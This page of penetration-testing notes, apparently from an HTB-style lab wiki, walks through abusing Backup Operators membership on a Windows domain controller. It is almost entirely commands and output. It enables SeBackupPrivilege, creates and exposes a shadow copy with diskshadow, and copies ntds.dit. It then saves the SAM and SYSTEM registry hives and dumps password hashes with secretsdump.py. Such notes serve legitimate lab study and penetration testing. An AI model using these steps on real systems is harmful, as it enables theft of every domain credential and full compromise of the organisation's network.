Backup Operators

Start by uploading and enabling the following powershell modules. 

PS C:\htb> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\htb> Import-Module .\SeBackupPrivilegeCmdLets.dll

If the privilege is disabled, we can enable it with Set-SeBackupPrivilege.

PS C:\htb> Set-SeBackupPrivilege
PS C:\htb> Get-SeBackupPrivilege

SeBackupPrivilege is enabled

Now we can try to copy ntds.dit file

PS C:\htb> diskshadow.exe

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  10/14/2020 12:57:52 AM

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

Now using Copy-FileSeBackupPrivilege , We can copy ntds.dit file. 

PS C:\htb> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

Copied 16777216 bytes

We can also backup SAM and SYSTEM file. 

C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV

The operation completed successfully.


C:\htb> reg save HKLM\SAM SAM.SAV

The operation completed successfully.

We can now dump password hash using secretdumps.py

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
PreviousSeImpersonate and SeAssignPrimaryTokenNextPerforming ping sweep

Last updated